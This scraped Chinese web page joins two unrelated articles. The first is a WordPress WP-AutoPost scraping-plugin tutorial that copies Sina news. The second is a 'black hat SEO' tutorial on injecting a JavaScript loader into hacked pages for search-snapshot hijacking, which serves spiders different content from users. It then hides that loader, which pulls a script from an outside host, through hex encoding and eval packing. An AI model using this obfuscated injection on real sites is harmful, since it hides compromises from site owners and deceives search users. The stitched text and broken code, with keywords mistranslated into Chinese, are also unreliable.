教程:wordpress的文章采集插件WP-autoPost使用详解
优采云 发布时间: 2022-11-26 04:08教程:wordpress的文章采集插件WP-autoPost使用详解
我们以采集
“新浪网新闻”为例,文章列表的URL是在手动指定的文章列表URL中输入URL即可,如下图:
之后需要在文章列表URL下设置特定文章URL的匹配规则
5.文章URL匹配规则
文章URL匹配规则的设置非常简单,不需要复杂的设置,提供两种匹配模式。您可以使用 URL 通配符匹配或 CSS 选择器进行匹配。通常,使用 URL 通配符匹配更容易。
1.使用URL通配符匹配
通过点击列表URL上的文章,我们可以发现每篇文章的URL都有如下结构
因此,将URL中变化的数字或字母替换为通配符(*),如:(*)/(*).shtml
2.使用CSS选择器进行匹配
使用css选择器进行匹配,我们只需要设置文章url的css选择器(我不知道什么是css选择器,待会我会学习如何设置css选择器),通过查看列表URL源码,在列表URL下找到具体文章的超链接代码,如下:
可以看出文章的超链接a标签在类为“contList”的标签内部,所以文章URL的CSS选择器只需要设置为.contList a即可,如下图:
设置完成后,如果不知道设置是否正确,可以点击上图中的测试按钮。如果设置正确,则会列出列表URL下的所有文章名称和对应的网页地址,如下图:
" />
6.文章抓取设置
在这个选项卡下,我们需要设置文章标题和文章内容的匹配规则。有两种设置方法。推荐使用CSS选择器的方式,更简单准确。(我不知道什么是CSS选择器,但我会在一分钟内学会如何设置CSS选择器)
我们只需要设置文章标题CSS选择器和文章内容CSS选择器就可以准确的抓取文章标题和文章内容。
在文章来源设置中,我们以采集
《新浪网新闻》为例。这里我们还是用这个例子来说明。通过查看列表 URL 下的一篇文章的源代码可以很容易地设置它。比如我们可以通过查看一篇具体的文章 的源代码如下:
可以看出文章标题在id为“artibodyTitle”的标签内,所以文章标题CSS选择器只需要设置为#artibodyTitle即可;
同样,找到文章内容的相关代码:
可以看出文章内容在id为“artibody”的标签内,所以文章内容的CSS选择器只需要设置为#artibody即可;如下所示:
设置完成后,如果不知道设置是否正确,可以点击测试按钮,输入测试地址。如果设置正确,会显示文章标题和文章内容,方便查看设置
7.抓取文章分页内容
如果文章内容太长,多个页面也可以抓取所有内容。这时候需要给文章的页面链接设置CSS选择器。通过查看具体文章网址的源代码,可以找到页面链接的地方。例如一篇文章的页面链接代码如下:
" />
如您所见,分页链接 A 标签位于类为“page-link”的标签内
因此文章分页链接的CSS选择器设置为.page-link a,如下图:
如果你在发布的时候也勾选了分页,那么发布的文章也会被分页。如果您的 WordPress 主题不支持标签,请不要勾选。
8.文章内容过滤功能
文章内容过滤功能可以过滤掉文中不需要的内容(如广告代码、版权信息等),可以设置两个关键词,删除两个关键词之间的内容,关键词2可以为空,表示删除关键词1之后的所有内容。
如下图,我们通过测试爬取文章后,发现文章中有我们不想发布的内容。切换到HTML显示,找到内容的HTML代码,分别设置两个关键词,过滤掉内容。
如上图,如果我们要过滤掉上面的
和
内容之间,添加如下设置
如果需要过滤掉多个地方,可以添加多组设置。
九、HTML标签过滤功能
HTML标签过滤功能,可以过滤掉采集
文章中的超链接(a标签),
干货教程:黑帽SEO教程为html中的js跳转url加密
有些黑帽SEO需要对跳转的js代码进行加密,学习JavaScript的加密方式。当我们的网站被黑了,看到这段代码,我们就会明白这是快照劫持的代码。删除它以解决网站被盗的问题。今天错误博客()分享的内容是《黑帽SEO教程加密html中js跳转url》。我希望能有所帮助。
1.未加密的js代码
JavaScript跳转是黑帽SEO中常用的快照劫持手段。例如在寄生虫程序的使用中,在被黑的html或php中添加如下代码即可完成快照劫持:
这段 JavaScript 代码的作用是导入 v6.js 文件。v6.js文件中的内容是一个if判断语句。如果访问百度蜘蛛、360蜘蛛、搜狗蜘蛛等,就会显示被劫持快照的内容。如果用户直接访问浏览器将显示原创
页面内容。
二、十六进制加密
首先,将上面的命令增加到以下内容:
window["document"]["write"]('scritp type="text/javascript" scr="v6.js"');
然后,对前面双引号内的内容进行十六进制加密,对后面单引号内的内容进行十六进制加密,如下:
" />
\x64\x6f\x63\x75\x6d\x65\x6e\x74
\x77\x72\x69\x74\x65
\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72 \x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63 \x6f\x6d\x2f\x76\x36\x2e\x6a\x73
这个可以用utf-8转十六进制加密在线工具来完成。博客站长导航有错误。
网站管理员导航()
加密完成后变为:
窗口["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x73\x63\x72\x69\x74\x70\ x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\ x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\ x6a\x73');
3.JS混淆加密压缩
然后,再次添加上面的js代码即可正常运行,即:
" />
窗口["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x73\x63\x72\x69\x74\x70\ x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\ x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\ x6a\x73');
利用站长工具的JS混淆加密压缩,将中间窗口的内容获取到;获取eval加密形式,博客站长导航出现错误。
网站管理员导航()
获取以下加密代码如下:
eval(function(p,a,c,k,e,d);if(!".replace(/^/,String))];e=function();c=1;};while(c–) if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);返回 p;}(' k["\\m\\a\\1\\9\\g\\5\\l\\0"]["\\b\\4\\7\\0\\5"](\ '\\2\\1\\4\\7\\0\\6\\e\\0\\j\\6\\5\\c\\8\\0\\5\\q\ \0\\3\\i\\d\\h\\d\\2\\1\\4\\7\\6\\0\\8\\e\\2\\1\\4 \\c\\8\\r\\0\\0\\6\\2\\n\\3\\3\\1\\9\\a\\b\\9\\f\\ 1\\a\\g\\3\\h\\o\\f\\i\\2\');',28,28,'x74|x63|x73|x2f|x72|x65|x70| x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|窗口|x6e|x64|x3a|x36|script|x78|x68'.split('|'), 0,{}))
生成的加密代码如下:
eval(function(p,a,c,k,e,d);if(!".replace(/^/,String))];e=function();c=1;};while(c–) if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);返回 p;}(' k["\\m\\a\\1\\9\\g\\5\\l\\0"]["\\b\\4\\7\\0\\5"](\ '\\2\\1\\4\\7\\0\\6\\e\\0\\j\\6\\5\\c\\8\\0\\5\\q\ \0\\3\\i\\d\\h\\d\\2\\1\\4\\7\\6\\0\\8\\e\\2\\1\\4 \\c\\8\\r\\0\\0\\6\\2\\n\\3\\3\\1\\9\\a\\b\\9\\f\\ 1\\a\\g\\3\\h\\o\\f\\i\\2\');',28,28,'x74|x63|x73|x2f|x72|x65|x70| x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|窗口|x6e|x64|x3a|x36|script|x78|x68'.split('|'), 0,{}))
这就是整个js的加密和压缩过程,解压过程可以反过来。